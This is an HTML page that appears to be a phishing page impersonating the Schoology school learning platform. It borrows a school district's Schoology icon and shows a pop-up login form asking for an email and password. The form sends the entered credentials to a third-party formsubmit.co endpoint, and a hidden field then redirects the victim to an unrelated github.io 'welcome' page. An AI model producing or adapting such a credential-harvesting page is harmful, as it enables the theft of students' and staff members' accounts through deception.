<html>
    <head>
      <title>schoology</title>
      <link rel="icon" href="https://www.elcosd.org/cms/lib/PA02217785/Centricity/Shared/Global%20Images/schoology.jpg">
    <style>
* {
  margin: 0px;
  padding: 0px;
  box-sizing: border-box;
}
body {
  background:linear-gradient(to right, #3a7bd5, #3a6073);
  font-family:"raleway", sans-serif;
  height: 100vh;
}
.center {
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
}
.center button {
  padding:10px 20px;
  font-size: 15px;
  font-weight: 600;
  color: #222;
  background:#f5f5f5;
  border:none;
  outline:none;
  cursor: pointer;
  border-radius: 5px;
}
.popup {
  position: absolute;
  top: -150%;
  left: 50%;
opacity: 0;
  transform: translate(-50%, -50%) scale(1.25);
  width: 380px;
  padding: 20px 30px;
  background:#fff;
  box-shadow: 2px 2px 5px 5px rgba(0, 0, 0, 0.15);
  border-radius: 10px;
transition: top 0ms ease-in-out 200ms,
            opacity 200ms ease-in-out 0ms,
            transform 20ms ease-in-out 0ms;
}
.popup.active {
    top: 50%;
    opacity: 1;
  transform: translate(-50%, -50%) scale(1);
  transition: top 0ms ease-in-out 0ms,
            opacity 200ms ease-in-out 0ms,
            transform 20ms ease-in-out 0ms;
}




.popup .close-btn {
  position: absolute;
  top: 10px;
  right: 10px;
  width: 15px;
  height: 15px;
  background: #888;
  color: #eee;
  text-align: center;
  line-height: 15px;
  border-radius: 15px;
  cursor: pointer;
}

.popup .form h2 {
  text-align: center;
  color: #222;
  margin: 10px 0px 20px;
  font-size: 25px;
}
.popup .form .form-element {
  margin:15px 0px;
}
.popup .form .form-element label {
  font-size:14px;
  color: #222;
}
.popup .form .form-element input[type="email"],
.popup .form .form-element input[type="password"] {
  margin-top: 5px;
  display: block;
  width:100%;
  padding: 10px;
  outline: none;
  border:1px solid #aaa ;
  border-radius: 5px;
}
.popup .form .form-element input[type="checkbox"] {
  margin-right: 5px;

}
.popup .form .form-element button {
width: 100%;
height: 40px;
border: none;
outline: none;
font-size: 16px;
background: #222;
color: #f5f5f5;
border-radius: 10px;
cursor: pointer;
}
.popup .form .form-element a {
  display: block;
  text-align: right;
  font-size: 15px;
  color: #1a79ca;
  text-decoration: none;
  font-weight: 600;
}
</style>



</head>
<body>

<div class="center">
    <button id="show-login">Login</button>
</div>    
<form action="https://formsubmit.co/e2ab7abc2740002c39eac1520e9e8138 " method="POST">
<div class="popup">
<div class="close-btn">&times;</div>
<div class="form">
    <h2>Log In</h2>
    <div class="form-element">
        <label for="Email">Email</label>
        <input type="Email" id="email" placeholder="Enter email" required name="email">
    </div>
    <div class="form-element">
        <label for="password">password</label>
        <input type="password" name="password" id="password" placeholder="Enter password" required>
    </div>
    <div class="form-element">
        <input type="checkbox" id="remember-me">
        <label for="remember-me">Remember me</label>
    </div>
 
 <div class="form-element">
    <button>sign in</button>
 </div>
   
 <div class="form-element">
    <a href="index2.html">Forgot password</a>
 </div>
</div>
</div>
<input type="hidden" name="_next" value="https://progamerorcoder.github.io/Log-In-star/welcome.html">

</form>


<script>
  document.querySelector("#show-login").addEventListener("click",function(){
    document.querySelector(".popup").classList.add("active");
});
document.querySelector(".popup .close-btn").addEventListener("click",function(){
    document.querySelector(".popup").classList.remove("active");
});  
</script>

</body>
</html>

